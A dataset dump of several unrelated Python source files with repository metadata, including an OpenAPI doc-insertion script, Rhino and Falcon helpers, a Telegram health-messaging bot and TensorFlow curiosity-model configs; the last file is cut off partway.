498ed27d25aaf7bb70dce790b84d513d20aa617b | 106 | py | Python | code/fakeRPi/__init__.py | BubiDevs/MagnumPi | 820038f7997379f0190c527914adbe2e2b615bb5 | [
"MIT"
] | 2 | 2018-08-09T10:35:42.000Z | 2020-12-04T06:38:09.000Z | code/fakeRPi/__init__.py | BubiDevs/MagnumPi | 820038f7997379f0190c527914adbe2e2b615bb5 | [
"MIT"
] | 2 | 2018-08-22T08:02:16.000Z | 2019-12-05T08:23:31.000Z | code/fakeRPi/__init__.py | BubiDevs/MagnumPi | 820038f7997379f0190c527914adbe2e2b615bb5 | [
"MIT"
] | null | null | null | """
This package is used to simulate RPi.GPIO library during development or if GPIO are not available.
""" | 35.333333 | 98 | 0.764151 | """
This package is used to simulate RPi.GPIO library during development or if GPIO are not available.
""" | 0 | 0 | 0 |
3231a1157ec2cc99477ddef20110685bb4430f56 | 2,155 | py | Python | tools/python/insert_descriptions.py | dhis2/dhis2-api-specification | bdef355508ec150be4bf0b4346b8b0d6a8e665b5 | [
"BSD-3-Clause"
] | 5 | 2019-08-30T09:56:27.000Z | 2021-02-22T11:08:34.000Z | tools/python/insert_descriptions.py | dhis2/dhis2-api-specification | bdef355508ec150be4bf0b4346b8b0d6a8e665b5 | [
"BSD-3-Clause"
] | null | null | null | tools/python/insert_descriptions.py | dhis2/dhis2-api-specification | bdef355508ec150be4bf0b4346b8b0d6a8e665b5 | [
"BSD-3-Clause"
] | 6 | 2018-10-12T07:50:11.000Z | 2020-10-18T05:39:49.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Apr 18 15:34:25 2018
@author: philld
"""
import requests
import json
import re
specfile="../../docs/spec/src/info_openapi.json"
#docsfile="../../docs/input/web_api.cm"
docsfile="/home/philld/reps/dhis2-docs/src/commonmark/en/content/developer/web-api.md"
ofile=open(specfile,'r')
openapi = json.load(ofile)
ofile.close()
docfile = open(docsfile, "r")
docs = docfile.read()
docfile.close()
recurseDict(openapi,"DESC")
apifile= open(specfile,'w')
apifile.write(json.dumps(openapi , sort_keys=False, indent=2, separators=(',', ': ')))
apifile.close()
| 25.05814 | 121 | 0.49884 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Apr 18 15:34:25 2018
@author: philld
"""
import requests
import json
import re
specfile="../../docs/spec/src/info_openapi.json"
#docsfile="../../docs/input/web_api.cm"
docsfile="/home/philld/reps/dhis2-docs/src/commonmark/en/content/developer/web-api.md"
ofile=open(specfile,'r')
openapi = json.load(ofile)
ofile.close()
docfile = open(docsfile, "r")
docs = docfile.read()
docfile.close()
def between(value, a, b):
    """Return the substring of *value* strictly between the first occurrence
    of *a* and the last occurrence of *b*, or '' when either marker is
    missing or they do not enclose anything.
    """
    start = value.find(a)
    end = value.rfind(b)
    if start == -1 or end == -1:
        return ""
    start += len(a)
    if start >= end:
        return ""
    return value[start:end]
def recurseList(l,p):
    """Walk a list node of the parsed OpenAPI tree, extending path *p*.

    Dict elements named via ``x-name`` or ``name`` recurse into recurseDict
    with the name appended to the path; other elements are ignored.
    """
    #print(p)
    for v in l:
        if isinstance(v, dict):
            if "x-name" in v:
                nP = p + "_n-" + v["x-name"]
                recurseDict(v,nP)
            else:
                if "name" in v:
                    nP = p + "_n-" + v["name"]
                    recurseDict(v,nP)
                else:
                    # NOTE(review): this branch is unreachable — v is a dict
                    # here, so isinstance(v, list) can never be True, and
                    # p + "_" + v would raise TypeError anyway. Likely meant
                    # to live one level up (handling list elements of l).
                    if isinstance(v, list):
                        nP = p + "_"+v
                        recurseList(v,nP)
def recurseDict(d,p):
    """Walk a dict node of the parsed OpenAPI tree, extending path *p* by each key.

    When a "description" key is reached, the markdown between the
    ``<!-- API+<path> -->`` / ``<!-- API-<path> -->`` markers in the global
    ``docs`` text replaces the description in place (mutates *d*).
    """
    #print(p)
    for k, v in d.items():
        if isinstance(v, dict):
            nP = p+"_"+k
            recurseDict(v,nP)
        else:
            if isinstance(v, list):
                nP = p+ "_"+k
                recurseList(v,nP)
            else:
                if k == "description":
                    tagS= "<!-- API+"+p+" -->"
                    tagE= "<!-- API-"+p+" -->"
                    text = between(docs,tagS,tagE)
                    if text != "":
                        # Join hard-wrapped lines (letter\nletter -> letter letter)
                        # and tag the block as auto-inserted.
                        text = re.sub(r'([a-zA-Z])\n([a-zA-Z])',r'\1 \2',"<!-- auto-inserted: do not edit here -->"+text)
                        #print(text[0:500])
                        d.update({"description":text})
recurseDict(openapi,"DESC")
apifile= open(specfile,'w')
apifile.write(json.dumps(openapi , sort_keys=False, indent=2, separators=(',', ': ')))
apifile.close()
| 1,455 | 0 | 69 |
edc42480a50e42e688504cc06387909d1322efa2 | 1,471 | py | Python | src/compas_singular/rhino/geometry/curve.py | tkmmark/compas_pattern | 50528a4f9d6a253e9b7864eae482d04490761a74 | [
"MIT"
] | 6 | 2019-02-12T17:49:41.000Z | 2020-04-15T10:28:49.000Z | src/compas_singular/rhino/geometry/curve.py | tkmmark/compas_pattern | 50528a4f9d6a253e9b7864eae482d04490761a74 | [
"MIT"
] | 3 | 2020-07-01T13:45:44.000Z | 2020-10-07T14:40:52.000Z | src/compas_singular/rhino/geometry/curve.py | tkmmark/compas_pattern | 50528a4f9d6a253e9b7864eae482d04490761a74 | [
"MIT"
] | 6 | 2019-02-21T11:20:19.000Z | 2020-04-02T10:20:00.000Z | from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
import rhinoscriptsyntax as rs
from compas_rhino.geometry import RhinoCurve
__all__ = [
'RhinoCurve'
]
| 27.240741 | 107 | 0.601632 | from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
import rhinoscriptsyntax as rs
from compas_rhino.geometry import RhinoCurve
__all__ = [
'RhinoCurve'
]
class RhinoCurve(RhinoCurve):
    """Extension of compas_rhino's RhinoCurve with divide/length/tangents helpers.

    NOTE(review): the class deliberately shadows the imported RhinoCurve name;
    anything importing this module gets the extended class — confirm that is
    intended.
    """
    def __init__(self):
        super(RhinoCurve, self).__init__()
    def divide(self, number_of_segments, over_space=False):
        """Return division points of the curve as lists of coordinates.

        With ``over_space=True`` the curve is evaluated at parameter-space
        values; otherwise Rhino's DivideCurve is used.
        """
        points = []
        # Redraw is disabled while querying Rhino, then re-enabled —
        # keep these two calls bracketing the geometry work.
        rs.EnableRedraw(False)
        if over_space:
            space = self.space(number_of_segments + 1)
            if space:
                points = [list(rs.EvaluateCurve(self.guid, param)) for param in space]
        else:
            points = rs.DivideCurve(self.guid, number_of_segments, create_points=False, return_points=True)
            points[:] = map(list, points)
        rs.EnableRedraw(True)
        return points
    def length(self):
        """Return the length of the curve.
        Returns
        -------
        float
            The curve's length.
        """
        return rs.CurveLength(self.guid)
    def tangents(self, points):
        """Return the curve tangent vector closest to each input point.

        NOTE(review): polycurves are silently skipped (empty result) —
        confirm whether that is intended or should raise like other types.
        """
        tangents = []
        if rs.IsPolyCurve(self.guid):
            pass
        elif rs.IsCurve(self.guid):
            for point in points:
                param = rs.CurveClosestPoint(self.guid, point)
                vector = list(rs.CurveTangent(self.guid, param))
                tangents.append(vector)
        else:
            raise Exception('Object is not a curve.')
        return tangents
| 941 | 287 | 23 |
5852391e230d4b53f1a5d88b39b5c71c7f25ba44 | 467 | py | Python | casedetails/serializers.py | LABETE/TestYourProject | 416d5e7993343e42f031e48f4d78e5332d698519 | [
"BSD-3-Clause"
] | null | null | null | casedetails/serializers.py | LABETE/TestYourProject | 416d5e7993343e42f031e48f4d78e5332d698519 | [
"BSD-3-Clause"
] | null | null | null | casedetails/serializers.py | LABETE/TestYourProject | 416d5e7993343e42f031e48f4d78e5332d698519 | [
"BSD-3-Clause"
] | null | null | null | from rest_framework import serializers
from .models import CaseDetail
class CaseDetailSerializer(serializers.ModelSerializer):
"""CaseDetailSerializer use the CaseDetail Model"""
| 29.1875 | 62 | 0.655246 | from rest_framework import serializers
from .models import CaseDetail
class CaseDetailSerializer(serializers.ModelSerializer):
    """Serializer exposing CaseDetail records over the REST API."""
    class Meta:
        model = CaseDetail
        # Fields displayed on the rest api for casedetails
        fields = (
            "id", "step", "expected", "actual", "input_data",
            "output_data", "defect_id", "defect_id_displayed",
            "case_id", "status",)
| 0 | 254 | 26 |
7eaede2556eae82c47ba4345831762e978e83739 | 547 | py | Python | kloudless/auth.py | theonlybex/kloudless-python | 3e00b4659e5f790a9129e858b19d0bf283cd8e1c | [
"MIT"
] | 28 | 2015-08-25T06:13:44.000Z | 2022-02-17T03:39:18.000Z | kloudless/auth.py | theonlybex/kloudless-python | 3e00b4659e5f790a9129e858b19d0bf283cd8e1c | [
"MIT"
] | 11 | 2015-09-15T07:31:02.000Z | 2021-02-09T10:30:13.000Z | kloudless/auth.py | theonlybex/kloudless-python | 3e00b4659e5f790a9129e858b19d0bf283cd8e1c | [
"MIT"
] | 8 | 2015-02-17T23:45:06.000Z | 2021-09-05T09:51:51.000Z | from __future__ import unicode_literals
from requests import auth
| 17.09375 | 59 | 0.66362 | from __future__ import unicode_literals
from requests import auth
class BaseAuth(auth.AuthBase):
    """Requests auth hook sending ``Authorization: <scheme> <key>``.

    Subclasses supply ``scheme`` (typically as a class attribute).
    """
    def __init__(self, key):
        self.key = key
    @property
    def scheme(self):
        # Abstract: concrete subclasses override with their scheme string.
        raise NotImplementedError
    @property
    def auth_header(self):
        return f'{self.scheme} {self.key}'
    def __call__(self, request):
        # requests invokes this hook with the outgoing PreparedRequest.
        request.headers['Authorization'] = self.auth_header
        return request
class APIKeyAuth(BaseAuth):
    """Auth hook that sends ``Authorization: APIKey <key>``."""
    scheme = 'APIKey'
class BearerTokenAuth(BaseAuth):
    """Auth hook that sends ``Authorization: Bearer <key>``."""
    scheme = 'Bearer'
| 200 | 208 | 69 |
4f209a3661740bb773beeff9691143e7078681ef | 343 | py | Python | PYROCKO/mom_to_sdr.py | alirezaniki/DPSA | 24c6bbb51e3b27721d63140fd46dadd855e0f2b8 | [
"MIT"
] | 4 | 2018-06-13T23:50:13.000Z | 2021-09-25T16:27:34.000Z | PYROCKO/mom_to_sdr.py | alirezaniki/DPSA | 24c6bbb51e3b27721d63140fd46dadd855e0f2b8 | [
"MIT"
] | null | null | null | PYROCKO/mom_to_sdr.py | alirezaniki/DPSA | 24c6bbb51e3b27721d63140fd46dadd855e0f2b8 | [
"MIT"
] | null | null | null | from pyrocko import moment_tensor as mtm
magnitude = 5.4
exp = mtm.magnitude_to_moment(magnitude) # convert the mag to moment in [Nm]
# init pyrocko moment tensor
m = mtm.MomentTensor(
mnn = 0.04*exp,
mee = 0.6*exp,
mdd = -0.63*exp,
mne = 0.04*exp,
mnd = 0.5*exp,
med = 0.21*exp)
print(m) # print moment tensor
| 18.052632 | 77 | 0.638484 | from pyrocko import moment_tensor as mtm
magnitude = 5.4
exp = mtm.magnitude_to_moment(magnitude) # convert the mag to moment in [Nm]
# init pyrocko moment tensor
m = mtm.MomentTensor(
mnn = 0.04*exp,
mee = 0.6*exp,
mdd = -0.63*exp,
mne = 0.04*exp,
mnd = 0.5*exp,
med = 0.21*exp)
print(m) # print moment tensor
| 0 | 0 | 0 |
ba371eaf23d5032469dfe1818f54ece09f6d0052 | 1,384 | py | Python | tests/Custom/app.py | bcsummers/falcon-provider-logger | c91573d6f8906c3e7e76bd00738c96f3f311d9d1 | [
"Apache-2.0"
] | 1 | 2020-08-03T18:09:46.000Z | 2020-08-03T18:09:46.000Z | tests/Custom/app.py | bcsummers/falcon-provider-logger | c91573d6f8906c3e7e76bd00738c96f3f311d9d1 | [
"Apache-2.0"
] | null | null | null | tests/Custom/app.py | bcsummers/falcon-provider-logger | c91573d6f8906c3e7e76bd00738c96f3f311d9d1 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""Falcon app used for testing."""
# standard library
import logging
from typing import Any
# third-party
import falcon
# first-party
from falcon_provider_logger.middleware import LoggerMiddleware
class LoggerCustomLoggerResource:
    """Logger middleware testing resource."""
    # NOTE(review): assumes LoggerMiddleware assigns ``log`` before a request
    # handler runs; it is None until then — confirm against the middleware.
    log = None
    def on_get(self, req: falcon.Request, resp: falcon.Response) -> None:
        """Support GET method."""
        # Echo the ``key`` query parameter at every log level.
        key: str = req.get_param('key')
        self.log.debug(f'DEBUG {key}')
        self.log.info(f'INFO {key}')
        self.log.warning(f'WARNING {key}')
        self.log.error(f'ERROR {key}')
        self.log.critical(f'CRITICAL {key}')
        resp.body = f'Logged - {key}'
    def on_post(self, req: falcon.Request, resp: falcon.Response) -> None:
        """Support POST method."""
        # Echo ``key`` and ``value`` parameters at every log level.
        key: str = req.get_param('key')
        value: Any = req.get_param('value')
        self.log.debug(f'DEBUG {key} {value}')
        self.log.info(f'INFO {key} {value}')
        self.log.warning(f'WARNING {key} {value}')
        self.log.error(f'ERROR {key} {value}')
        self.log.critical(f'CRITICAL {key} {value}')
        resp.body = f'Logged - {key}'
logger: object = logging.getLogger('custom')
app_custom_logger = falcon.API(middleware=[LoggerMiddleware(logger=logger)])
app_custom_logger.add_route('/middleware', LoggerCustomLoggerResource())
| 31.454545 | 76 | 0.642341 | # -*- coding: utf-8 -*-
"""Falcon app used for testing."""
# standard library
import logging
from typing import Any
# third-party
import falcon
# first-party
from falcon_provider_logger.middleware import LoggerMiddleware
class LoggerCustomLoggerResource:
    """Logger middleware testing resource.

    Emits one message at each of the five standard logging levels per
    request so tests can assert the injected logger receives them.
    """

    # Logger instance; None until injected (presumably by LoggerMiddleware —
    # TODO confirm against the middleware implementation).
    log = None

    def on_get(self, req: falcon.Request, resp: falcon.Response) -> None:
        """Support GET method."""
        key: str = req.get_param('key')
        self.log.debug(f'DEBUG {key}')
        self.log.info(f'INFO {key}')
        self.log.warning(f'WARNING {key}')
        self.log.error(f'ERROR {key}')
        self.log.critical(f'CRITICAL {key}')
        # Echo the key so the caller can confirm the request was handled.
        resp.body = f'Logged - {key}'

    def on_post(self, req: falcon.Request, resp: falcon.Response) -> None:
        """Support POST method."""
        key: str = req.get_param('key')
        value: Any = req.get_param('value')
        self.log.debug(f'DEBUG {key} {value}')
        self.log.info(f'INFO {key} {value}')
        self.log.warning(f'WARNING {key} {value}')
        self.log.error(f'ERROR {key} {value}')
        self.log.critical(f'CRITICAL {key} {value}')
        resp.body = f'Logged - {key}'
# Named logger the middleware should forward resource log calls through.
logger: object = logging.getLogger('custom')
# Test app: LoggerMiddleware configured with the custom logger above.
app_custom_logger = falcon.API(middleware=[LoggerMiddleware(logger=logger)])
app_custom_logger.add_route('/middleware', LoggerCustomLoggerResource())
| 0 | 0 | 0 |
2504132d12d78a2baab76691825092820fad4917 | 4,063 | py | Python | poshan_didi_bot.py | dimagi/poshan-didi-server | dde1b3008c6ba9febf781f3df702ef91ee4b25f8 | [
"BSD-3-Clause"
] | 2 | 2019-06-14T11:37:37.000Z | 2020-04-16T08:30:43.000Z | poshan_didi_bot.py | dimagi/poshan-didi-server | dde1b3008c6ba9febf781f3df702ef91ee4b25f8 | [
"BSD-3-Clause"
] | 5 | 2020-01-28T22:44:22.000Z | 2022-02-10T00:10:07.000Z | poshan_didi_bot.py | dimagi/poshan-didi-server | dde1b3008c6ba9febf781f3df702ef91ee4b25f8 | [
"BSD-3-Clause"
] | 1 | 2020-12-03T19:48:28.000Z | 2020-12-03T19:48:28.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Poshan Didi!
"""
import logging
import logging.handlers
import beneficiary_bot
import nurse_bot
from telegram.ext import Updater, CommandHandler, MessageHandler, Filters
from simple_settings import settings
from registration import registration_conversation
# Enable logging: root config (file, format, level) comes from settings.
logging.basicConfig(filename=settings.LOG_FILENAME,
                    format=settings.LOG_FORMAT,
                    level=settings.LOG_LEVEL)
logger = logging.getLogger(__name__)
# Rotate the log file at 10 MB, keeping up to 100 numbered backups.
handler = logging.handlers.RotatingFileHandler(
    settings.LOG_FILENAME,
    maxBytes=10*1024*1024,
    backupCount=100
)
logger.addHandler(handler)
# Define a few command handlers. These usually take the two arguments bot and
# update. Error handlers also receive the raised TelegramError object in error.
def error(update, context):
    """Log Errors caused by Updates.

    Args:
        update: The Telegram update that triggered the error.
        context: Callback context carrying the raised error in
            ``context.error``.
    """
    logger.warning('Update "%s" caused error "%s"', update, context.error)
def main():
    """Start the bot: wire handlers, begin polling, and block until exit."""
    beneficiary_bot.setup_state_machines()
    # Create the Updater and pass it the bot's token.
    # Make sure to set use_context=True to use the new context based callbacks
    updater = Updater(settings.TELEGRAM_TOKEN, use_context=True)
    # Get the dispatcher to register handlers
    dp = updater.dispatcher
    # Add the registration conversation, which handles the /start command
    dp.add_handler(registration_conversation)
    # Add a nurse command to skip the current escalated message
    # (only allow the nurse to access this command)
    # dp.add_handler(CommandHandler('noreply', nurse_bot.skip,
    #                               Filters.chat(settings.NURSE_CHAT_ID)))
    # Add a nurse command to set state for a user (only allow the nurse to access this command)
    # dp.add_handler(CommandHandler('state', nurse_bot.set_state,
    #                               Filters.chat(settings.NURSE_CHAT_ID)))
    # Add a nurse command to set state for a user (only allow the nurse to access this command)
    # dp.add_handler(CommandHandler('state', nurse_bot.set_super_state,
    #                               Filters.chat(settings.GOD_MODE)))
    # dp.add_handler(CommandHandler('cohortstate', nurse_bot.set_cohort_super_state,
    #                               Filters.chat(settings.GOD_MODE)))
    # Add a nurse command to set state for a user (only allow the nurse to access this command)
    # dp.add_handler(CommandHandler('send_next_modules', nurse_bot.send_next_modules,
    #                               Filters.chat(settings.GOD_MODE)))
    # Add a nurse command to set state for a user (only allow the nurse to access this command)
    # dp.add_handler(CommandHandler('vhnd', nurse_bot.send_vhnd_reminder,
    #                               Filters.chat(settings.GOD_MODE)))
    # sign off messages (restricted to the GOD_MODE chat)
    dp.add_handler(CommandHandler('sendglobal', nurse_bot.send_global_msg,
                                  Filters.chat(settings.GOD_MODE)))
    # on non-command i.e., a normal message - route the message from
    # Telegram. Use different handlers for the nurse and user messages.
    # Currently all non-nurse text goes to beneficiary_bot.all_done.
    dp.add_handler(MessageHandler(
        (Filters.text & (~ Filters.chat(settings.NURSE_CHAT_ID))), beneficiary_bot.all_done))
    # dp.add_handler(MessageHandler(
    #     (Filters.text & (~ Filters.chat(settings.NURSE_CHAT_ID))), beneficiary_bot.process_user_input))
    # dp.add_handler(MessageHandler(
    #     (Filters.text & Filters.chat(settings.NURSE_CHAT_ID)), nurse_bot.process_nurse_input))
    # log all errors
    dp.add_error_handler(error)
    logger.info(
        '************************** POSHAN DIDI HAS RETURNED **************************')
    # Start the Bot.
    updater.start_polling()
    # Run the bot until you press Ctrl-C or the process receives SIGINT,
    # SIGTERM or SIGABRT. This should be used most of the time, since
    # start_polling() is non-blocking and will stop the bot gracefully.
    updater.idle()
# Script entry point.
if __name__ == '__main__':
    main()
| 38.695238 | 105 | 0.679793 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Poshan Didi!
"""
import logging
import logging.handlers
import beneficiary_bot
import nurse_bot
from telegram.ext import Updater, CommandHandler, MessageHandler, Filters
from simple_settings import settings
from registration import registration_conversation
# Enable logging: root config (file, format, level) comes from settings.
logging.basicConfig(filename=settings.LOG_FILENAME,
                    format=settings.LOG_FORMAT,
                    level=settings.LOG_LEVEL)
logger = logging.getLogger(__name__)
# Rotate the log file at 10 MB, keeping up to 100 numbered backups.
handler = logging.handlers.RotatingFileHandler(
    settings.LOG_FILENAME,
    maxBytes=10*1024*1024,
    backupCount=100
)
logger.addHandler(handler)
# Define a few command handlers. These usually take the two arguments bot and
# update. Error handlers also receive the raised TelegramError object in error.
def error(update, context):
    """Log Errors caused by Updates.

    Args:
        update: The Telegram update that triggered the error.
        context: Callback context carrying the raised error in
            ``context.error``.
    """
    logger.warning('Update "%s" caused error "%s"', update, context.error)
def main():
    """Start the bot: wire handlers, begin polling, and block until exit."""
    beneficiary_bot.setup_state_machines()
    # Create the Updater and pass it the bot's token.
    # Make sure to set use_context=True to use the new context based callbacks
    updater = Updater(settings.TELEGRAM_TOKEN, use_context=True)
    # Get the dispatcher to register handlers
    dp = updater.dispatcher
    # Add the registration conversation, which handles the /start command
    dp.add_handler(registration_conversation)
    # Add a nurse command to skip the current escalated message
    # (only allow the nurse to access this command)
    # dp.add_handler(CommandHandler('noreply', nurse_bot.skip,
    #                               Filters.chat(settings.NURSE_CHAT_ID)))
    # Add a nurse command to set state for a user (only allow the nurse to access this command)
    # dp.add_handler(CommandHandler('state', nurse_bot.set_state,
    #                               Filters.chat(settings.NURSE_CHAT_ID)))
    # Add a nurse command to set state for a user (only allow the nurse to access this command)
    # dp.add_handler(CommandHandler('state', nurse_bot.set_super_state,
    #                               Filters.chat(settings.GOD_MODE)))
    # dp.add_handler(CommandHandler('cohortstate', nurse_bot.set_cohort_super_state,
    #                               Filters.chat(settings.GOD_MODE)))
    # Add a nurse command to set state for a user (only allow the nurse to access this command)
    # dp.add_handler(CommandHandler('send_next_modules', nurse_bot.send_next_modules,
    #                               Filters.chat(settings.GOD_MODE)))
    # Add a nurse command to set state for a user (only allow the nurse to access this command)
    # dp.add_handler(CommandHandler('vhnd', nurse_bot.send_vhnd_reminder,
    #                               Filters.chat(settings.GOD_MODE)))
    # sign off messages (restricted to the GOD_MODE chat)
    dp.add_handler(CommandHandler('sendglobal', nurse_bot.send_global_msg,
                                  Filters.chat(settings.GOD_MODE)))
    # on non-command i.e., a normal message - route the message from
    # Telegram. Use different handlers for the nurse and user messages.
    # Currently all non-nurse text goes to beneficiary_bot.all_done.
    dp.add_handler(MessageHandler(
        (Filters.text & (~ Filters.chat(settings.NURSE_CHAT_ID))), beneficiary_bot.all_done))
    # dp.add_handler(MessageHandler(
    #     (Filters.text & (~ Filters.chat(settings.NURSE_CHAT_ID))), beneficiary_bot.process_user_input))
    # dp.add_handler(MessageHandler(
    #     (Filters.text & Filters.chat(settings.NURSE_CHAT_ID)), nurse_bot.process_nurse_input))
    # log all errors
    dp.add_error_handler(error)
    logger.info(
        '************************** POSHAN DIDI HAS RETURNED **************************')
    # Start the Bot.
    updater.start_polling()
    # Run the bot until you press Ctrl-C or the process receives SIGINT,
    # SIGTERM or SIGABRT. This should be used most of the time, since
    # start_polling() is non-blocking and will stop the bot gracefully.
    updater.idle()
# Script entry point.
if __name__ == '__main__':
    main()
| 0 | 0 | 0 |
445b411ea6aba700be77b4ec60ac04e0382d24d7 | 94,119 | py | Python | curiosity/interaction/models.py | neuroailab/curiosity_deprecated | 65f7cde13b07cdac52eed39535a94e7544c396b8 | [
"Apache-2.0"
] | null | null | null | curiosity/interaction/models.py | neuroailab/curiosity_deprecated | 65f7cde13b07cdac52eed39535a94e7544c396b8 | [
"Apache-2.0"
] | 2 | 2017-11-18T00:53:33.000Z | 2017-11-18T00:53:40.000Z | curiosity/interaction/models.py | neuroailab/curiosity_deprecated | 65f7cde13b07cdac52eed39535a94e7544c396b8 | [
"Apache-2.0"
] | null | null | null | '''
Policy and intrinsic reward models.
'''
import numpy as np
import tensorflow as tf
from curiosity.models.model_building_blocks import ConvNetwithBypasses
from curiosity.models import explicit_future_prediction_base as fp_base
from curiosity.models import jerk_models
import distutils.version
use_tf1 = distutils.version.LooseVersion(tf.VERSION) >= distutils.version.LooseVersion('1.0.0')
#TODO replace all these makeshift helpers
def postprocess_depths(depths):
    '''
    Assumes depths is of shape [batch_size, time_number, height, width, 3]

    The three channels encode a base-256 fixed-point depth in millimeters;
    the result is metric depth divided by 4 as normalization.
    '''
    as_float = tf.cast(depths, tf.float32)
    high = as_float[:, :, :, :, 0:1]
    mid = as_float[:, :, :, :, 1:2]
    low = as_float[:, :, :, :, 2:3]
    # Combine base-256 digits, convert mm -> m.
    metric = (high * 256. + mid + low / 256.0) / 1000.0
    return metric / 4.
# Base world-model config: the "momentum complete bypass" network from
# jerk_models (concat joining, relu), extended with input shapes.
default_damian_cfg = jerk_models.cfg_mom_complete_bypass(768, use_segmentation=False,
        method='concat', nonlin='relu')
default_damian_cfg.update({'state_shape' : [2, 128, 170, 3], 'action_shape' : [2, 8]})
# Small encoder/decoder world-model config: 3-layer conv encode, MLP action
# join, 3-layer deconv decode to a 1-channel depth prediction.
sample_depth_future_cfg = {
    'state_shape' : [2, 64, 64, 3],
    'action_shape' : [2, 8],
    'action_join' : {
        'reshape_dims' : [8, 8, 5],
        'mlp' : {
            'hidden_depth' : 2,
            'hidden' : {
                1 : {'num_features' : 320, 'dropout' : .75},
                2 : {'num_features' : 320, 'activation' : 'identity'}
            }
        }
    },
    'encode' : {
        'encode_depth' : 3,
        'encode' : {
            1 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 10}},
            2 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 10}},
            3 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 5}},
        }
    },
    'deconv' : {
        'deconv_depth' : 3,
        'deconv' : {
            1 : {'deconv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 10}, 'bypass' : 0},
            2 : {'deconv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 10}, 'bypass' : 0},
            3 : {'deconv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 1}, 'bypass' : 0}
        }
    }
}

# Deeper variant: 5-layer encode/deconv with per-layer bypass connections.
a_bigger_depth_future_config = {
    'state_shape' : [2, 64, 64, 3],
    'action_shape' : [2, 8],
    'action_join' : {
        'reshape_dims' : [8, 8, 5],
        'mlp' : {
            'hidden_depth' : 3,
            'hidden' : {
                1 : {'num_features' : 320},
                2 : {'num_features' : 320},
                3 : {'num_features' : 320, 'activation' : 'identity'}
            }
        }
    },
    'encode' : {
        'encode_depth' : 5,
        'encode' : {
            1 : {'conv' : {'filter_size' : 5, 'stride' : 2, 'num_filters' : 20}},
            2 : {'conv' : {'filter_size' : 3, 'stride' : 1, 'num_filters' : 20}},
            3 : {'conv' : {'filter_size' : 5, 'stride' : 2, 'num_filters' : 20}},
            4 : {'conv' : {'filter_size' : 3, 'stride' : 1, 'num_filters' : 10}},
            5 : {'conv' : {'filter_size' : 5, 'stride' : 2, 'num_filters' : 5}},
        }
    },
    'deconv' : {
        'deconv_depth' : 5,
        'deconv' : {
            1 : {'deconv' : {'filter_size' : 5, 'stride' : 2, 'num_filters' : 20}, 'bypass' : 4},
            2 : {'deconv' : {'filter_size' : 3, 'stride' : 1, 'num_filters' : 20}, 'bypass' : 3},
            3 : {'deconv' : {'filter_size' : 5, 'stride' : 2, 'num_filters' : 20}, 'bypass' : 2},
            4 : {'deconv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 10}, 'bypass' : 1},
            5 : {'deconv' : {'filter_size' : 5, 'stride' : 1, 'num_filters' : 1}, 'bypass' : 0}
        }
    }
}

# Hourglass-style config: conv encode to a latent, separate action MLP, and a
# future model (MLP + reshape + deconv) decoding back to feature maps.
hourglass_latent_model_cfg = {
    'state_shape' : [2, 64, 64, 3],
    'action_shape' : [2, 8],
    'encode' : {
        'encode_depth' : 4,
        'encode' : {
            1: {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 32}},
            2: {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 32}},
            3: {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 32}},
            4: {'conv' : {'filter_size' : 3, 'stride' : 1, 'num_filters' : 8}}
        }
    },
    'action_model' : {
        'mlp' : {
            'hidden_depth' : 2,
            'hidden' : {
                1: {'num_features' : 256},
                2: {'num_features' : 16, 'activation' : 'identity'}
            }
        }
    },
    'future_model' : {
        'mlp' : {
            'hidden_depth' : 2,
            'hidden' : {
                1: {'num_features' : 256},
                2: {'num_features' : 128, 'activation' : 'identity'}
            }
        },
        'reshape_dims' : [4, 4, 8],
        'deconv' : {
            'deconv_depth' : 3,
            'deconv' : {
                1 : {'deconv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 16}, 'bypass' : 0},
                2 : {'deconv' : {'filter_size' : 3, 'stride' : 1, 'num_filters' : 16}, 'bypass' : 0},
                3 : {'deconv' : {'filter_size' : 3, 'stride' : 1, 'num_filters' : 8}, 'bypass' : 0}
            }
        }
    }
}

# Mario-style world model: conv encode, action MLP, and a purely MLP-based
# future model (no deconv decoder).
mario_world_model_config = {
    'state_shape' : [2, 64, 64, 3],
    'action_shape' : [2, 8],
    'encode' : {
        'encode_depth' : 4,
        'encode' : {
            1: {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 32}},
            2: {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 32}},
            3: {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 32}},
            4: {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 32}}
        }
    },
    'action_model' : {
        'mlp' : {
            'hidden_depth' : 2,
            'hidden' : {
                1: {'num_features' : 256},
                2: {'num_features' : 16, 'activation' : 'identity'}
            }
        }
    },
    'future_model' : {
        'mlp' : {
            'hidden_depth' : 2,
            'hidden' : {
                1: {'num_features' : 512},
                2: {'num_features' : 512, 'activation' : 'identity'}
            }
        }
    }
}
class MixedUncertaintyModel:
    '''For both action and future uncertainty prediction, simultaneously, as
    separate predictions.

    Consider merging with UncertaintyModel, but right now that might look too
    messy. Want to leave that functionality alone.

    NOTE(review): class body is empty in this chunk — implementation appears
    to live elsewhere or was removed.
    '''
class ObjectThereWorldModel:
    '''
    A dummy oracle world model that just says the true value of whether an
    object is in the field of view.

    NOTE(review): class body is empty in this chunk — implementation appears
    to live elsewhere or was removed.
    '''
class ForceMagSquareWorldModel:
    '''
    Similar to the above, but just gives the square of the force.

    NOTE(review): class body is empty in this chunk — implementation appears
    to live elsewhere or was removed.
    '''
# Combined configs pairing an uncertainty model (conv encode + MLP head) with
